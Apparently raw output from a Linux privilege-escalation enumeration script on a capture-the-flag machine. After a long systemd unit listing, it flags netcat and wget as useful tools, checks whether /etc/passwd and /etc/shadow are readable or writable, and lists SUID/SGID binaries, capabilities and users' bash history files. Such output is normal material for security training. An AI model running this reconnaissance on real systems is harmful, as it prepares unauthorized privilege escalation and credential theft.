-rw-r--r-- 1 root root 624 Jan 18 2017 dev-mqueue.mount
-rw-r--r-- 1 root root 431 Jan 18 2017 emergency.target
-rw-r--r-- 1 root root 501 Jan 18 2017 exit.target
-rw-r--r-- 1 root root 440 Jan 18 2017 final.target
-rw-r--r-- 1 root root 460 Jan 18 2017 getty.target
-rw-r--r-- 1 root root 558 Jan 18 2017 graphical.target
-rw-r--r-- 1 root root 487 Jan 18 2017 halt.target
-rw-r--r-- 1 root root 447 Jan 18 2017 hibernate.target
-rw-r--r-- 1 root root 468 Jan 18 2017 hybrid-sleep.target
-rw-r--r-- 1 root root 553 Jan 18 2017 initrd-fs.target
-rw-r--r-- 1 root root 526 Jan 18 2017 initrd-root-fs.target
-rw-r--r-- 1 root root 691 Jan 18 2017 initrd-switch-root.target
-rw-r--r-- 1 root root 671 Jan 18 2017 initrd.target
-rw-r--r-- 1 root root 501 Jan 18 2017 kexec.target
-rw-r--r-- 1 root root 395 Jan 18 2017 local-fs-pre.target
-rw-r--r-- 1 root root 507 Jan 18 2017 local-fs.target
-rw-r--r-- 1 root root 405 Jan 18 2017 machine.slice
-rw-r--r-- 1 root root 492 Jan 18 2017 multi-user.target
-rw-r--r-- 1 root root 464 Jan 18 2017 network-online.target
-rw-r--r-- 1 root root 461 Jan 18 2017 network-pre.target
-rw-r--r-- 1 root root 480 Jan 18 2017 network.target
-rw-r--r-- 1 root root 514 Jan 18 2017 nss-lookup.target
-rw-r--r-- 1 root root 473 Jan 18 2017 nss-user-lookup.target
-rw-r--r-- 1 root root 354 Jan 18 2017 paths.target
-rw-r--r-- 1 root root 552 Jan 18 2017 poweroff.target
-rw-r--r-- 1 root root 377 Jan 18 2017 printer.target
-rw-r--r-- 1 root root 693 Jan 18 2017 proc-sys-fs-binfmt_misc.automount
-rw-r--r-- 1 root root 603 Jan 18 2017 proc-sys-fs-binfmt_misc.mount
-rw-r--r-- 1 root root 543 Jan 18 2017 reboot.target
-rw-r--r-- 1 root root 396 Jan 18 2017 remote-fs-pre.target
-rw-r--r-- 1 root root 482 Jan 18 2017 remote-fs.target
-rw-r--r-- 1 root root 486 Jan 18 2017 rescue.target
-rw-r--r-- 1 root root 500 Jan 18 2017 rpcbind.target
-rw-r--r-- 1 root root 402 Jan 18 2017 shutdown.target
-rw-r--r-- 1 root root 362 Jan 18 2017 sigpwr.target
-rw-r--r-- 1 root root 420 Jan 18 2017 sleep.target
-rw-r--r-- 1 root root 409 Jan 18 2017 slices.target
-rw-r--r-- 1 root root 380 Jan 18 2017 smartcard.target
-rw-r--r-- 1 root root 356 Jan 18 2017 sockets.target
-rw-r--r-- 1 root root 380 Jan 18 2017 sound.target
-rw-r--r-- 1 root root 441 Jan 18 2017 suspend.target
-rw-r--r-- 1 root root 353 Jan 18 2017 swap.target
-rw-r--r-- 1 root root 715 Jan 18 2017 sys-fs-fuse-connections.mount
-rw-r--r-- 1 root root 719 Jan 18 2017 sys-kernel-config.mount
-rw-r--r-- 1 root root 662 Jan 18 2017 sys-kernel-debug.mount
-rw-r--r-- 1 root root 518 Jan 18 2017 sysinit.target
-rw-r--r-- 1 root root 1.3K Jan 18 2017 syslog.socket
-rw-r--r-- 1 root root 585 Jan 18 2017 system-update.target
-rw-r--r-- 1 root root 436 Jan 18 2017 system.slice
-rw-r--r-- 1 root root 646 Jan 18 2017 systemd-ask-password-console.path
-rw-r--r-- 1 root root 574 Jan 18 2017 systemd-ask-password-wall.path
-rw-r--r-- 1 root root 409 Jan 18 2017 systemd-bus-proxyd.socket
-rw-r--r-- 1 root root 540 Jan 18 2017 systemd-fsckd.socket
-rw-r--r-- 1 root root 524 Jan 18 2017 systemd-initctl.socket
-rw-r--r-- 1 root root 607 Jan 18 2017 systemd-journald-audit.socket
-rw-r--r-- 1 root root 1.1K Jan 18 2017 systemd-journald-dev-log.socket
-rw-r--r-- 1 root root 842 Jan 18 2017 systemd-journald.socket
-rw-r--r-- 1 root root 591 Jan 18 2017 systemd-networkd.socket
-rw-r--r-- 1 root root 617 Jan 18 2017 systemd-rfkill.socket
-rw-r--r-- 1 root root 450 Jan 18 2017 systemd-tmpfiles-clean.timer
-rw-r--r-- 1 root root 578 Jan 18 2017 systemd-udevd-control.socket
-rw-r--r-- 1 root root 570 Jan 18 2017 systemd-udevd-kernel.socket
-rw-r--r-- 1 root root 395 Jan 18 2017 time-sync.target
-rw-r--r-- 1 root root 405 Jan 18 2017 timers.target
-rw-r--r-- 1 root root 417 Jan 18 2017 umount.target
-rw-r--r-- 1 root root 392 Jan 18 2017 user.slice
-rw-r--r-- 1 root root 663 Jan 18 2017 systemd-networkd-resolvconf-update.service
-rw-r--r-- 1 root root 153 Jan 17 2017 apt-daily.service
-rw-r--r-- 1 root root 162 Jan 17 2017 apt-daily.timer
-rw-r--r-- 1 root root 342 Jan 13 2017 getty-static.service
-rw-r--r-- 1 root root 153 Jan 13 2017 sigpwr-container-shutdown.service
-rw-r--r-- 1 root root 152 Jan 13 2017 systemd-networkd-resolvconf-update.path
-rw-r--r-- 1 root root 491 Jan 12 2017 dbus.service
-rw-r--r-- 1 root root 106 Jan 12 2017 dbus.socket
-rw-r--r-- 1 root root 189 Dec 16 2016 uuidd.service
-rw-r--r-- 1 root root 126 Dec 16 2016 uuidd.socket
-rw-r--r-- 1 root root 735 Nov 30 2016 networking.service
-rw-r--r-- 1 root root 497 Nov 30 2016 ifup@.service
-rw-r--r-- 1 root root 631 Nov 3 2016 accounts-daemon.service
-rw-r--r-- 1 root root 251 Sep 17 2016 open-vm-tools.service
-rw-r--r-- 1 root root 285 Jun 16 2016 keyboard-setup.service
-rw-r--r-- 1 root root 288 Jun 16 2016 console-setup.service
lrwxrwxrwx 1 root root 27 May 10 2016 plymouth-log.service -> plymouth-read-write.service
lrwxrwxrwx 1 root root 21 May 10 2016 plymouth.service -> plymouth-quit.service
-rw-r--r-- 1 root root 412 May 10 2016 plymouth-halt.service
-rw-r--r-- 1 root root 426 May 10 2016 plymouth-kexec.service
-rw-r--r-- 1 root root 421 May 10 2016 plymouth-poweroff.service
-rw-r--r-- 1 root root 200 May 10 2016 plymouth-quit-wait.service
-rw-r--r-- 1 root root 194 May 10 2016 plymouth-quit.service
-rw-r--r-- 1 root root 244 May 10 2016 plymouth-read-write.service
-rw-r--r-- 1 root root 416 May 10 2016 plymouth-reboot.service
-rw-r--r-- 1 root root 532 May 10 2016 plymouth-start.service
-rw-r--r-- 1 root root 291 May 10 2016 plymouth-switch-root.service
-rw-r--r-- 1 root root 490 May 10 2016 systemd-ask-password-plymouth.path
-rw-r--r-- 1 root root 467 May 10 2016 systemd-ask-password-plymouth.service
drwxr-xr-x 2 root root 4.0K Apr 12 2016 runlevel1.target.wants
drwxr-xr-x 2 root root 4.0K Apr 12 2016 runlevel2.target.wants
drwxr-xr-x 2 root root 4.0K Apr 12 2016 runlevel3.target.wants
drwxr-xr-x 2 root root 4.0K Apr 12 2016 runlevel4.target.wants
drwxr-xr-x 2 root root 4.0K Apr 12 2016 runlevel5.target.wants
-rw-r--r-- 1 root root 251 Apr 5 2016 cron.service
-rw-r--r-- 1 root root 290 Apr 5 2016 rsyslog.service
-rw-r--r-- 1 root root 395 Jun 3 2015 resolvconf.service
-rw-r--r-- 1 root root 790 Jun 1 2015 friendly-recovery.service
-rw-r--r-- 1 root root 241 Mar 2 2015 ufw.service
-rw-r--r-- 1 root root 250 Feb 24 2015 ureadahead-stop.service
-rw-r--r-- 1 root root 242 Feb 24 2015 ureadahead-stop.timer
-rw-r--r-- 1 root root 401 Feb 24 2015 ureadahead.service
-rw-r--r-- 1 root root 188 Feb 24 2014 rsync.service

/lib/systemd/system/apache2.service.d:
total 4.0K
-rw-r--r-- 1 root root 42 Apr 12 2016 apache2-systemd.conf

/lib/systemd/system/halt.target.wants:
total 0
lrwxrwxrwx 1 root root 24 May 10 2016 plymouth-halt.service -> ../plymouth-halt.service

/lib/systemd/system/initrd-switch-root.target.wants:
total 0
lrwxrwxrwx 1 root root 25 May 10 2016 plymouth-start.service -> ../plymouth-start.service
lrwxrwxrwx 1 root root 31 May 10 2016 plymouth-switch-root.service -> ../plymouth-switch-root.service

/lib/systemd/system/kexec.target.wants:
total 0
lrwxrwxrwx 1 root root 25 May 10 2016 plymouth-kexec.service -> ../plymouth-kexec.service

/lib/systemd/system/multi-user.target.wants:
total 0
lrwxrwxrwx 1 root root 15 Dec 4 2017 getty.target -> ../getty.target
lrwxrwxrwx 1 root root 33 Dec 4 2017 systemd-ask-password-wall.path -> ../systemd-ask-password-wall.path
lrwxrwxrwx 1 root root 25 Dec 4 2017 systemd-logind.service -> ../systemd-logind.service
lrwxrwxrwx 1 root root 39 Dec 4 2017 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service
lrwxrwxrwx 1 root root 32 Dec 4 2017 systemd-user-sessions.service -> ../systemd-user-sessions.service
lrwxrwxrwx 1 root root 15 Jan 12 2017 dbus.service -> ../dbus.service
lrwxrwxrwx 1 root root 29 May 10 2016 plymouth-quit-wait.service -> ../plymouth-quit-wait.service
lrwxrwxrwx 1 root root 24 May 10 2016 plymouth-quit.service -> ../plymouth-quit.service

/lib/systemd/system/poweroff.target.wants:
total 0
lrwxrwxrwx 1 root root 39 Dec 4 2017 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service
lrwxrwxrwx 1 root root 28 May 10 2016 plymouth-poweroff.service -> ../plymouth-poweroff.service

/lib/systemd/system/reboot.target.wants:
total 0
lrwxrwxrwx 1 root root 39 Dec 4 2017 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service
lrwxrwxrwx 1 root root 26 May 10 2016 plymouth-reboot.service -> ../plymouth-reboot.service

/lib/systemd/system/sysinit.target.wants:
total 0
lrwxrwxrwx 1 root root 24 Dec 4 2017 systemd-udevd.service -> ../systemd-udevd.service
lrwxrwxrwx 1 root root 30 Dec 4 2017 systemd-update-utmp.service -> ../systemd-update-utmp.service
lrwxrwxrwx 1 root root 24 Dec 4 2017 console-setup.service -> ../console-setup.service
lrwxrwxrwx 1 root root 20 Dec 4 2017 cryptsetup.target -> ../cryptsetup.target
lrwxrwxrwx 1 root root 22 Dec 4 2017 dev-hugepages.mount -> ../dev-hugepages.mount
lrwxrwxrwx 1 root root 19 Dec 4 2017 dev-mqueue.mount -> ../dev-mqueue.mount
lrwxrwxrwx 1 root root 25 Dec 4 2017 keyboard-setup.service -> ../keyboard-setup.service
lrwxrwxrwx 1 root root 28 Dec 4 2017 kmod-static-nodes.service -> ../kmod-static-nodes.service
lrwxrwxrwx 1 root root 36 Dec 4 2017 proc-sys-fs-binfmt_misc.automount -> ../proc-sys-fs-binfmt_misc.automount
lrwxrwxrwx 1 root root 19 Dec 4 2017 setvtrgb.service -> ../setvtrgb.service
lrwxrwxrwx 1 root root 32 Dec 4 2017 sys-fs-fuse-connections.mount -> ../sys-fs-fuse-connections.mount
lrwxrwxrwx 1 root root 26 Dec 4 2017 sys-kernel-config.mount -> ../sys-kernel-config.mount
lrwxrwxrwx 1 root root 25 Dec 4 2017 sys-kernel-debug.mount -> ../sys-kernel-debug.mount
lrwxrwxrwx 1 root root 36 Dec 4 2017 systemd-ask-password-console.path -> ../systemd-ask-password-console.path
lrwxrwxrwx 1 root root 25 Dec 4 2017 systemd-binfmt.service -> ../systemd-binfmt.service
lrwxrwxrwx 1 root root 30 Dec 4 2017 systemd-hwdb-update.service -> ../systemd-hwdb-update.service
lrwxrwxrwx 1 root root 32 Dec 4 2017 systemd-journal-flush.service -> ../systemd-journal-flush.service
lrwxrwxrwx 1 root root 27 Dec 4 2017 systemd-journald.service -> ../systemd-journald.service
lrwxrwxrwx 1 root root 36 Dec 4 2017 systemd-machine-id-commit.service -> ../systemd-machine-id-commit.service
lrwxrwxrwx 1 root root 31 Dec 4 2017 systemd-modules-load.service -> ../systemd-modules-load.service
lrwxrwxrwx 1 root root 30 Dec 4 2017 systemd-random-seed.service -> ../systemd-random-seed.service
lrwxrwxrwx 1 root root 25 Dec 4 2017 systemd-sysctl.service -> ../systemd-sysctl.service
lrwxrwxrwx 1 root root 37 Dec 4 2017 systemd-tmpfiles-setup-dev.service -> ../systemd-tmpfiles-setup-dev.service
lrwxrwxrwx 1 root root 33 Dec 4 2017 systemd-tmpfiles-setup.service -> ../systemd-tmpfiles-setup.service
lrwxrwxrwx 1 root root 31 Dec 4 2017 systemd-udev-trigger.service -> ../systemd-udev-trigger.service
lrwxrwxrwx 1 root root 30 May 10 2016 plymouth-read-write.service -> ../plymouth-read-write.service
lrwxrwxrwx 1 root root 25 May 10 2016 plymouth-start.service -> ../plymouth-start.service

/lib/systemd/system/sockets.target.wants:
total 0
lrwxrwxrwx 1 root root 25 Dec 4 2017 systemd-initctl.socket -> ../systemd-initctl.socket
lrwxrwxrwx 1 root root 32 Dec 4 2017 systemd-journald-audit.socket -> ../systemd-journald-audit.socket
lrwxrwxrwx 1 root root 34 Dec 4 2017 systemd-journald-dev-log.socket -> ../systemd-journald-dev-log.socket
lrwxrwxrwx 1 root root 26 Dec 4 2017 systemd-journald.socket -> ../systemd-journald.socket
lrwxrwxrwx 1 root root 31 Dec 4 2017 systemd-udevd-control.socket -> ../systemd-udevd-control.socket
lrwxrwxrwx 1 root root 30 Dec 4 2017 systemd-udevd-kernel.socket -> ../systemd-udevd-kernel.socket
lrwxrwxrwx 1 root root 14 Jan 12 2017 dbus.socket -> ../dbus.socket

/lib/systemd/system/timers.target.wants:
total 0
lrwxrwxrwx 1 root root 31 Dec 4 2017 systemd-tmpfiles-clean.timer -> ../systemd-tmpfiles-clean.timer

/lib/systemd/system/systemd-timesyncd.service.d:
total 4.0K
-rw-r--r-- 1 root root 251 Jan 12 2017 disable-with-time-daemon.conf

/lib/systemd/system/sigpwr.target.wants:
total 0
lrwxrwxrwx 1 root root 36 Dec 4 2017 sigpwr-container-shutdown.service -> ../sigpwr-container-shutdown.service

/lib/systemd/system/rescue.target.wants:
total 0
lrwxrwxrwx 1 root root 39 Dec 4 2017 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service

/lib/systemd/system/resolvconf.service.wants:
total 0
lrwxrwxrwx 1 root root 42 Dec 4 2017 systemd-networkd-resolvconf-update.path -> ../systemd-networkd-resolvconf-update.path

/lib/systemd/system/rc-local.service.d:
total 4.0K
-rw-r--r-- 1 root root 290 Jan 12 2017 debian.conf

/lib/systemd/system/graphical.target.wants:
total 0
lrwxrwxrwx 1 root root 39 Dec 4 2017 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service

/lib/systemd/system/local-fs.target.wants:
total 0
lrwxrwxrwx 1 root root 29 Dec 4 2017 systemd-remount-fs.service -> ../systemd-remount-fs.service

/lib/systemd/system/getty.target.wants:
total 0
lrwxrwxrwx 1 root root 23 Dec 4 2017 getty-static.service -> ../getty-static.service

/lib/systemd/system/busnames.target.wants:
total 0

/lib/systemd/system/runlevel1.target.wants:
total 0

/lib/systemd/system/runlevel2.target.wants:
total 0

/lib/systemd/system/runlevel3.target.wants:
total 0

/lib/systemd/system/runlevel4.target.wants:
total 0

/lib/systemd/system/runlevel5.target.wants:
total 0

/lib/systemd/system-sleep:
total 4.0K
-rwxr-xr-x 1 root root 92 Mar 17 2016 hdparm

/lib/systemd/system-preset:
total 4.0K
-rw-r--r-- 1 root root 869 Jan 18 2017 90-systemd.preset

/lib/systemd/system-generators:
total 668K
-rwxr-xr-x 1 root root 59K Jan 18 2017 systemd-dbus1-generator
-rwxr-xr-x 1 root root 71K Jan 18 2017 systemd-cryptsetup-generator
-rwxr-xr-x 1 root root 43K Jan 18 2017 systemd-debug-generator
-rwxr-xr-x 1 root root 79K Jan 18 2017 systemd-fstab-generator
-rwxr-xr-x 1 root root 39K Jan 18 2017 systemd-getty-generator
-rwxr-xr-x 1 root root 119K Jan 18 2017 systemd-gpt-auto-generator
-rwxr-xr-x 1 root root 39K Jan 18 2017 systemd-hibernate-resume-generator
-rwxr-xr-x 1 root root 39K Jan 18 2017 systemd-insserv-generator
-rwxr-xr-x 1 root root 35K Jan 18 2017 systemd-rc-local-generator
-rwxr-xr-x 1 root root 31K Jan 18 2017 systemd-system-update-generator
-rwxr-xr-x 1 root root 103K Jan 18 2017 systemd-sysv-generator

/lib/systemd/network:
total 12K
-rw-r--r-- 1 root root 404 Jan 18 2017 80-container-host0.network
-rw-r--r-- 1 root root 482 Jan 18 2017 80-container-ve.network
-rw-r--r-- 1 root root 80 Jan 18 2017 99-default.link

/lib/systemd/system-shutdown:
total 0


[00;33m### SOFTWARE #############################################[00m
[00;31m[-] Sudo version:[00m
Sudo version 1.8.16


[00;31m[-] Apache version:[00m
Server version: Apache/2.4.18 (Ubuntu)
Server built: 2017-09-18T15:09:02


[00;31m[-] Apache user configuration:[00m
APACHE_RUN_USER=www-data
APACHE_RUN_GROUP=www-data


[00;31m[-] Installed Apache modules:[00m
Loaded Modules:
core_module (static)
so_module (static)
watchdog_module (static)
http_module (static)
log_config_module (static)
logio_module (static)
version_module (static)
unixd_module (static)
access_compat_module (shared)
alias_module (shared)
auth_basic_module (shared)
authn_core_module (shared)
authn_file_module (shared)
authz_core_module (shared)
authz_host_module (shared)
authz_user_module (shared)
autoindex_module (shared)
deflate_module (shared)
dir_module (shared)
env_module (shared)
filter_module (shared)
mime_module (shared)
mpm_prefork_module (shared)
negotiation_module (shared)
php7_module (shared)
setenvif_module (shared)
status_module (shared)


[00;33m### INTERESTING FILES ####################################[00m
[00;31m[-] Useful file locations:[00m
/bin/nc
/bin/netcat
/usr/bin/wget


[00;31m[-] Can we read/write sensitive files:[00m
-rw-r--r-- 1 root root 1482 Dec 4 2017 /etc/passwd
-rw-r--r-- 1 root root 820 Dec 4 2017 /etc/group
-rw-r--r-- 1 root root 575 Oct 22 2015 /etc/profile
-rw-r----- 1 root shadow 933 Dec 4 2017 /etc/shadow


[00;31m[-] SUID files:[00m
-rwsr-xr-x 1 root root 40152 Dec 16 2016 /bin/mount
-rwsr-xr-x 1 root root 30800 Jul 12 2016 /bin/fusermount
-rwsr-xr-x 1 root root 40128 Mar 29 2016 /bin/su
-rwsr-xr-x 1 root root 27608 Dec 16 2016 /bin/umount
-rwsr-xr-x 1 root root 44680 May 7 2014 /bin/ping6
-rwsr-xr-x 1 root root 142032 Jan 28 2017 /bin/ntfs-3g
-rwsr-xr-x 1 root root 44168 May 7 2014 /bin/ping
-rwsr-xr-x 1 root root 40432 Mar 29 2016 /usr/bin/chsh
-rwsr-xr-x 1 root root 39904 Mar 29 2016 /usr/bin/newgrp
-rwsr-xr-x 1 root root 136808 Jan 20 2017 /usr/bin/sudo
-rwsr-xr-x 1 root root 49584 Mar 29 2016 /usr/bin/chfn
-rwsr-xr-x 1 root root 54256 Mar 29 2016 /usr/bin/passwd
-rwsr-xr-x 1 root root 75304 Mar 29 2016 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 10624 Feb 9 2017 /usr/bin/vmware-user-suid-wrapper
-rwsr-xr-- 1 root messagebus 42992 Jan 12 2017 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 10240 Feb 25 2014 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 428240 Aug 11 2016 /usr/lib/openssh/ssh-keysign


[00;31m[-] SGID files:[00m
-rwxr-sr-x 1 root shadow 35632 Mar 16 2016 /sbin/pam_extrausers_chkpwd
-rwxr-sr-x 1 root shadow 35600 Mar 16 2016 /sbin/unix_chkpwd
-rwxr-sr-x 1 root shadow 22768 Mar 29 2016 /usr/bin/expiry
-rwxr-sr-x 1 root crontab 36080 Apr 5 2016 /usr/bin/crontab
-rwxr-sr-x 1 root ssh 358624 Aug 11 2016 /usr/bin/ssh-agent
-rwxr-sr-x 1 root shadow 62336 Mar 29 2016 /usr/bin/chage
-rwxr-sr-x 1 root tty 27368 Dec 16 2016 /usr/bin/wall
-rwxr-sr-x 1 root tty 14752 Mar 1 2016 /usr/bin/bsd-write
-rwxr-sr-x 1 root mlocate 39520 Nov 17 2014 /usr/bin/mlocate


[00;31m[+] Files with POSIX capabilities set:[00m
/usr/bin/systemd-detect-virt = cap_dac_override,cap_sys_ptrace+ep
/usr/bin/mtr = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep


[-] Can't search *.conf files as no keyword was entered

[-] Can't search *.php files as no keyword was entered

[-] Can't search *.log files as no keyword was entered

[-] Can't search *.ini files as no keyword was entered

[00;31m[-] All *.conf files in /etc (recursive 1 level):[00m
-rw-r--r-- 1 root root 703 May 5 2015 /etc/logrotate.conf
-rw-r--r-- 1 root root 604 Jul 2 2015 /etc/deluser.conf
-rw-r--r-- 1 root root 497 May 4 2014 /etc/nsswitch.conf
-rw-r--r-- 1 root root 14867 Apr 11 2016 /etc/ltrace.conf
-rw-r--r-- 1 root root 7788 Dec 4 2017 /etc/ca-certificates.conf
-rw-r--r-- 1 root root 552 Mar 16 2016 /etc/pam.conf
-rw-r--r-- 1 root root 2084 Sep 5 2015 /etc/sysctl.conf
-rw-r--r-- 1 root root 338 Nov 17 2014 /etc/updatedb.conf
-rw-r--r-- 1 root root 1260 Mar 16 2016 /etc/ucf.conf
-rw-r--r-- 1 root root 2584 Feb 18 2016 /etc/gai.conf
-rw-r--r-- 1 root root 4781 Mar 17 2016 /etc/hdparm.conf
-rw-r--r-- 1 root root 967 Oct 30 2015 /etc/mke2fs.conf
-rw-r--r-- 1 root root 3028 Feb 15 2017 /etc/adduser.conf
-rw-r--r-- 1 root root 771 Mar 6 2015 /etc/insserv.conf
-rw-r--r-- 1 root root 2969 Nov 10 2015 /etc/debconf.conf
-rw-r--r-- 1 root root 92 Oct 22 2015 /etc/host.conf
-rw-r--r-- 1 root root 191 Jan 18 2016 /etc/libaudit.conf
-rw-r--r-- 1 root root 144 Dec 4 2017 /etc/kernel-img.conf
-rw-r--r-- 1 root root 34 Jan 27 2016 /etc/ld.so.conf
-rw-r--r-- 1 root root 1371 Jan 27 2016 /etc/rsyslog.conf
-rw-r--r-- 1 root root 280 Jun 19 2014 /etc/fuse.conf
-rw-r--r-- 1 root root 350 Dec 4 2017 /etc/popularity-contest.conf


[00;31m[-] Location and contents (if accessible) of .bash_history file(s):[00m
/home/scriptmanager/.bash_history
/home/arrexel/.bash_history


[00;31m[-] Location and Permissions (if accessible) of .bak file(s):[00m
-rw-r--r-- 1 root root 3024 Dec 4 2017 /etc/apt/sources.bak


[00;31m[-] Any interesting mail in /var/mail:[00m
total 8
drwxrwsr-x 2 root mail 4096 Feb 15 2017 .
drwxr-xr-x 12 root root 4096 Dec 4 2017 ..


[00;33m### SCAN COMPLETE ####################################[00m